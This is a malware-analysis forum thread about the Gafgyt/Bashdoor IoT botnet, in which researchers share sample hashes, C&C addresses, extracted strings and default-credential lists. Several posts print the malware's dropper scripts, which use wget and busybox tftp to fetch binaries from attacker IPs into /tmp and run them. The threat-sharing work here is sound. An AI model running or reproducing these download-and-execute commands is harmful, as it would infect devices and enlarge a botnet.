A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #24098  by unixfreaxjp
 Thu Oct 09, 2014 3:50 am
aaSSfxxx wrote:forgot to link of the post I was talking to, so here it is: http://www.kernelmode.info/forum/viewto ... 505#p23989
If I may say. In most of built malware in NIX they might compile it right so, yes, the trace is in there and can be used for sig-building. But using gcc/libc sigs for pattern is very "evadable" easily like : (1) exploit base/shellcode malware..by nature not using them, and (2) infamous object stripping.

I assume this is the file in quest:
Code: Select all
$ md5 apache
MD5 (apache) = 371b8b20d4dd207f7b3f61bb30a7cb22
$ file apache
apache: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped
There's 25 section headers starts fr 0x83364, and no ".comment" in it, no way to -
find GCC version, it is stripped off. PoC:
Code: Select all
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .note.ABI-tag     NOTE            080480d4 0000d4 000020 00   A  0   0  4
  [ 2] .rel.plt          REL             08048118 000118 000008 08   A  0   4  4
  [ 3] .init             PROGBITS        08048120 000120 000030 00  AX  0   0  4
  [ 4] .plt              PROGBITS        08048150 000150 000010 00  AX  0   0  4
  [ 5] .text             PROGBITS        08048160 000160 0641ac 00  AX  0   0 16
  [ 6] __libc_freeres_fn PROGBITS        080ac310 064310 000af7 00  AX  0   0 16
  [ 7] .fini             PROGBITS        080ace08 064e08 00001c 00  AX  0   0  4
  [ 8] .rodata           PROGBITS        080ace40 064e40 01885c 00   A  0   0 32
  [ 9] __libc_atexit     PROGBITS        080c569c 07d69c 000004 00   A  0   0  4
  [10] __libc_subfreeres PROGBITS        080c56a0 07d6a0 000030 00   A  0   0  4
  [11] .eh_frame         PROGBITS        080c56d0 07d6d0 0051dc 00   A  0   0  4
  [12] .gcc_except_table PROGBITS        080ca8ac 0828ac 000120 00   A  0   0  1
  [13] .tdata            PROGBITS        080cb9cc 0829cc 000010 00 WAT  0   0  4
  [14] .tbss             NOBITS          080cb9dc 0829dc 00002c 00 WAT  0   0  4
  [15] .ctors            PROGBITS        080cb9dc 0829dc 00000c 00  WA  0   0  4
  [16] .dtors            PROGBITS        080cb9e8 0829e8 00000c 00  WA  0   0  4
  [17] .jcr              PROGBITS        080cb9f4 0829f4 000004 00  WA  0   0  4
  [18] .data.rel.ro      PROGBITS        080cb9f8 0829f8 00002c 00  WA  0   0  4
  [19] .got              PROGBITS        080cba24 082a24 000008 04  WA  0   0  4
  [20] .got.plt          PROGBITS        080cba2c 082a2c 000010 04  WA  0   0  4
  [21] .data             PROGBITS        080cba40 082a40 000840 00  WA  0   0 32
  [22] .bss              NOBITS          080cc280 083280 005c3c 00  WA  0   0 32
  [23] __libc_freeres_pt NOBITS          080d1ebc 083280 000018 00  WA  0   0  4
  [24] .shstrtab         STRTAB          00000000 083280 0000e4 00      0   0  1

 Section to Segment mapping:
   00     .note.ABI-tag .plt .init .text __libc_freeres_fn .fini .rodata __libc_atexit __libc_subfreeres .eh_frame .gcc_except_table
   01     .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
   02     .note.ABI-tag
   03     .tdata .tbss
It's a very basic NIX object stripping commands which (I think) most unixmen might know it (I will NOT expose it HOW in here).
Another "hint" (based on my personal experience) as effect of stripping is, relocation section '.rel.plt' in offset 0x118 contains 1 odd entry ..< I found this similar "glitch" in some cases of object stripping (using malware builder..non-standard..they are using..etc), but this might be caused by other reasons too.
Code: Select all
Offset     Info    Type          Sym.Value
080cba38    0x02a   unrecognized: 2a
Point is: better use other vector for sig, rgds
 #25423  by benkow_
 Mon Mar 09, 2015 10:37 pm
Hello,
Sorry for up this old thread but I think here we talk about Linux/Gafgyt.
New sample attached:
C&C 104.192.0.130:69
From hxxp://104.192.0.130/God/ -
bot-arm https://www.virustotal.com/fr/file/2f09 ... 425920322/
bot-m68k https://www.virustotal.com/fr/file/4e61 ... 425920268/
bot-mips https://www.virustotal.com/fr/file/0345 ... 425920644/
bot-mipsel https://www.virustotal.com/fr/file/c90a ... 425920727/
bot-powerpc https://www.virustotal.com/file/1e5d72b ... 425920729/
bot-sparc https://www.virustotal.com/file/ce701fa ... 425920268/
bot-x86 https://www.virustotal.com/fr/file/26ca ... 425920320/
The server binary: hxxp://104.192.0.130/server
https://www.virustotal.com/file/2a04c21 ... 425921008/

And... the source code of the server hxxp://104.192.0.130/server.c -> http://pastebin.com/vdWW47uk

attached
Attachments
infected
(134.52 KiB) Downloaded 67 times
 #25433  by sysopfb
 Tue Mar 10, 2015 11:53 pm
benkow_ wrote:Hello,
Sorry for up this old thread but I think here we talk about Linux/Gafgyt.
New sample attached:
C&C 104.192.0.130:69
From hxxp://104.192.0.130/God/ -
bot-arm https://www.virustotal.com/fr/file/2f09 ... 425920322/
bot-m68k https://www.virustotal.com/fr/file/4e61 ... 425920268/
bot-mips https://www.virustotal.com/fr/file/0345 ... 425920644/
bot-mipsel https://www.virustotal.com/fr/file/c90a ... 425920727/
bot-powerpc https://www.virustotal.com/file/1e5d72b ... 425920729/
bot-sparc https://www.virustotal.com/file/ce701fa ... 425920268/
bot-x86 https://www.virustotal.com/fr/file/26ca ... 425920320/
The server binary: hxxp://104.192.0.130/server
https://www.virustotal.com/file/2a04c21 ... 425921008/

And... the source code of the server hxxp://104.192.0.130/server.c -> http://pastebin.com/vdWW47uk

attached

104.192.0.130/pl
104.192.0.130/client
 #26372  by unixfreaxjp
 Sat Jul 25, 2015 11:57 am
Linux/Bash0day / Bashdoor
New one, CNC was taken down. strings to ID the threat:
Code: Select all
0x0009560  DEFAULT
0x0009568  IP: %d.%d.%d.%d
0x000957A  8.8.8.8
0x0009582  /proc/net/route
0x0009592  	0x000	
0x000959D  /proc/cpuinfo
0x00095AB  BOGOMIPS
0x00095B7  /bin/sh
0x00095BF  all
0x00095C5  syn
0x00095C9  rst
0x00095CD  fin
0x00095D1  ack
0x00095D5  psh
0x00095D9  Invalid flag "%s"
0x00095EB  Failed opening raw socket.
0x0009606  Failed setting raw headers mode.
0x0009629  GET %s HTTP/1.0
0x000963A  Host: %s
0x0009644  Connection: close
0x000965A  %d.%d.%d.%d
0x0009666  PING
0x000966B  recv: %d, %s
0x0009678  self
0x0009680  /proc/
0x0009687  /cmdline
0x0009690  /proc
0x0009696  [ %s ] Starting new scan with [ %d ] sockets
0x00096C3  echo -e '\x67\x61\x79\x66\x67\x74'
0x00096E8  REPORT %s:%s:%s - Report Count: %d B: %s
0x0009711  cd /tmp || cd /var/run || cd /mnt;busybox\
 tftp 80.242.123.218 -c get bin3.sh;sh bin3.sh;\
busybox tftp -r bin2.sh -g 80.242.123.218; sh bin2.sh;\
busybox wget http://80.242.123.218:8080/bin.sh; \
sh bin.sh;echo -e '\x62\x69\x6e\x66\x61\x67\x74'
0x0009802  CURRENTSTATE
0x000980F  ipState: %d.%d.%d.%d
0x0009826  PONG!
0x000982C  GETLOCALIP
0x0009837  My IP: %s
0x0009841  TIMEOUT
0x0009849  TIMEOUT <time>
0x0009858  TIMEOUT = %d
0x0009865  SCANNER
0x000986D  SCANNER ON | OFF
0x000987E  EON
0x0009882  EOFF
0x0009887  DNS
0x000988B  HOLD
0x0009890  JUNK
0x0009895  JUNK <ip> <port> <time>
0x00098AD  UDP
0x00098B1  RANDOM
0x00098B8  TCP
0x00098BC  KILLATTK
0x00098C5  LOLNOGTFO
0x00098CF  ./libc
0x00098D6  ./mips
0x00098DD  ./x86_64
0x00098E6  ./arm
0x00098EC  ./mipsel
0x00098F5  BUILD %s
0x00098FE  PING %i
0x0009906  PONG %i
0x000990E  DUP
0x0009915  %s 2>&1
0x000991F  80.242.123.218:1981
0x0009933  root
0x000993A  admin
0x0009942  1234
0x0009949  12345
0x0009951  invalid
0x0009959  incorrect
0x0009963  fail
0x0009968  again
0x000996E  wrong
0x0009974  accessdenied
0x0009981  error
0x0009987  bad
0x000998B  success
0x0009993  busybox
0x000999B  shell
0x00099A1  dvrdvs
0x00099A8  user
0x00099AD  login
0x00099B3  pass
0x00099B8  name
0x00099BD  gayfgt
0x00099C4  binfagt
all are self explanatory by reference first post of this repository and above strings.
Cnc:
Code: Select all
80.242.123.218
Sample: https://www.virustotal.com/en/file/9287 ... 437825078/
#MalwareMustDie
Attachments
7z / infected
(24.85 KiB) Downloaded 56 times
 #26478  by unixfreaxjp
 Sun Aug 09, 2015 8:50 am
Code: Select all
[0x0804d839]> !file *
set of attempt to infect multi-platform IoT:
10: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
11: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
12: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
13: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
14: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
15: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
16: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
17: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
[0x0804d839]> !md5 *
MD5 (10) = 1d2043c5ecdaa9ab0cebfd5cc9580245
MD5 (11) = ffce3977f72fb7181aebfd239dc910f8
MD5 (12) = 0aeac30ff8d74bc45d87e67fc803f78b
MD5 (13) = f5219266c28795528929d02c161368ab
MD5 (14) = 496972b9e4b2a9f104edb2eee00b3a3a
MD5 (15) = 568611d303e88c0cdc492c087bd9050a
MD5 (16) = 1cc27d8210c9d40cb74ab70c30c6f54a
MD5 (17) = 71b4513b846118f5b530a0ec88734712
[0x0804d839]>
source, thanks to @da_667
Image
play dead...
Image
installer:
Code: Select all
rm -rf 10 11 12 13 14 15 16 17
cd /tmp && wget -q http://162.213.199.116/10 && chmod +x 10 && ./10
cd /tmp && wget -q http://162.213.199.116/11 && chmod +x 11 && ./11
cd /tmp && wget -q http://162.213.199.116/12 && chmod +x 12 && ./12
cd /tmp && wget -q http://162.213.199.116/13 && chmod +x 13 && ./13
cd /tmp && wget -q http://162.213.199.116/14 && chmod +x 14 && ./14
cd /tmp && wget -q http://162.213.199.116/15 && chmod +x 15 && ./15
cd /tmp && wget -q http://162.213.199.116/16 && chmod +x 16 && ./16
cd /tmp && wget -q http://162.213.199.116/17 && chmod +x 17 && ./17
cnc pointed to source infection
Image
seems the previous code: (ref: http://www.kernelmode.info/forum/viewto ... 505#p23988 )
Code: Select all
0000000267F0  bin/busybox;echo -e '\147\141\171\146\147\164
Attachments
7z/infected
(302.23 KiB) Downloaded 58 times
 #26497  by tWiCe
 Tue Aug 11, 2015 2:25 pm
Dropped SH script:
Code: Select all
killall -9 1
killall -9 2
killall -9 3
killall -9 4
killall -9 5
killall -9 6
killall -9 7
killall -9 8
killall -9 9
killall -9 10
killall -9 11
killall -9 12
killall -9 14
killall -9 15
killall -9 16
killall -9 mips
killall -9 mipsel
killall -9 sh4
killall -9 ppc
killall -9 x86_64
killall -9 armv5l
killall -9 i686
killall -9 armv6l
killall -9 armv4l

rm -rf 1 2 3 4 5 6 7 8 9 10 11 12 14 15 16 17 c1 c2 c3 c4 c5 c6 c7 c8 c9 c10 c11 c12 c14 c15 c16 c17
cd /tmp && wget -q http://192.3.207.242/c1 && chmod +x c1 && ./c1
cd /tmp && wget -q http://192.3.207.242/c2 && chmod +x c2 && ./c2
cd /tmp && wget -q http://192.3.207.242/c3 && chmod +x c3 && ./c3
cd /tmp && wget -q http://192.3.207.242/c4 && chmod +x c4 && ./c4
cd /tmp && wget -q http://192.3.207.242/c5 && chmod +x c5 && ./c5
cd /tmp && wget -q http://192.3.207.242/c6 && chmod +x c6 && ./c6
cd /tmp && wget -q http://192.3.207.242/c7 && chmod +x c7 && ./c7
cd /tmp && wget -q http://192.3.207.242/c8 && chmod +x c8 && ./c8
cd /tmp && wget -q http://192.3.207.242/c9 && chmod +x c9 && ./c9
cd /tmp && wget -q http://192.3.207.242/c10 && chmod +x c10 && ./c10
cd /tmp && wget -q http://192.3.207.242/c11 && chmod +x c11 && ./c11
cd /tmp && wget -q http://192.3.207.242/c12 && chmod +x c12 && ./c12
cd /tmp && wget -q http://192.3.207.242/c14 && chmod +x c14 && ./c14
cd /tmp && wget -q http://192.3.207.242/c15 && chmod +x c15 && ./c15
cd /tmp && wget -q http://192.3.207.242/c16 && chmod +x c16 && ./c16
cd /tmp && wget -q http://192.3.207.242/c17 && chmod +x c17 && ./c17
rm -rf *
samples @ attach
Attachments
infected
(518.47 KiB) Downloaded 49 times
 #26635  by shibumi
 Tue Sep 01, 2015 9:35 am
Hello,
I've found a new method for spreading bash0day alias shellshock alias bashdoor alias gayfgt.

They are using a 'shutgun'-approach now.

First they are bruteforcing ssh. Then they are downloading .d.sh via wget and executing it.
Code: Select all
# Filename .d.sh 
rm -rf .a .b .c .d .e .f .g .h .i .j
cd /tmp && wget -q http://192.187.101.74/.a && chmod +x .a && ./.a
cd /tmp && wget -q http://192.187.101.74/.b && chmod +x .b && ./.b
cd /tmp && wget -q http://192.187.101.74/.c && chmod +x .c && ./.c
cd /tmp && wget -q http://192.187.101.74/.d && chmod +x .d && ./.d
cd /tmp && wget -q http://192.187.101.74/.e && chmod +x .e && ./.e
cd /tmp && wget -q http://192.187.101.74/.f && chmod +x .f && ./.f
cd /tmp && wget -q http://192.187.101.74/.g && chmod +x .g && ./.g
cd /tmp && wget -q http://192.187.101.74/.h && chmod +x .h && ./.h
cd /tmp && wget -q http://192.187.101.74/.i && chmod +x .i && ./.i
cd /tmp && wget -q http://192.187.101.74/.j && chmod +x .j && ./.j
the binaries are named from '.a' to '.j' and have been compiled for different architectures:
Code: Select all
a:                    ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
b:                    ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
c:                    ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
d:                    ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
e:                    ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
f:                    ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
g:                    ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
h:                    ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
i:                    ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, not stripped
j:                    ELF 32-bit MSB executable, SPARC, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, not stripped
I never saw Motorola m68k and Reneas SuperH architecture before..

Some whois-information about the Host:
Code: Select all
OriginAS:       AS33387
City:           North Kansas City
StateProv:      MO
PostalCode:     64116
Country:        US
Little Hint: I;ve seen the same approach while spreading SID IRC-Bot from a Host in Turkey. I will edit this post later and post the link to it here.
Attachments
infected
(372.78 KiB) Downloaded 45 times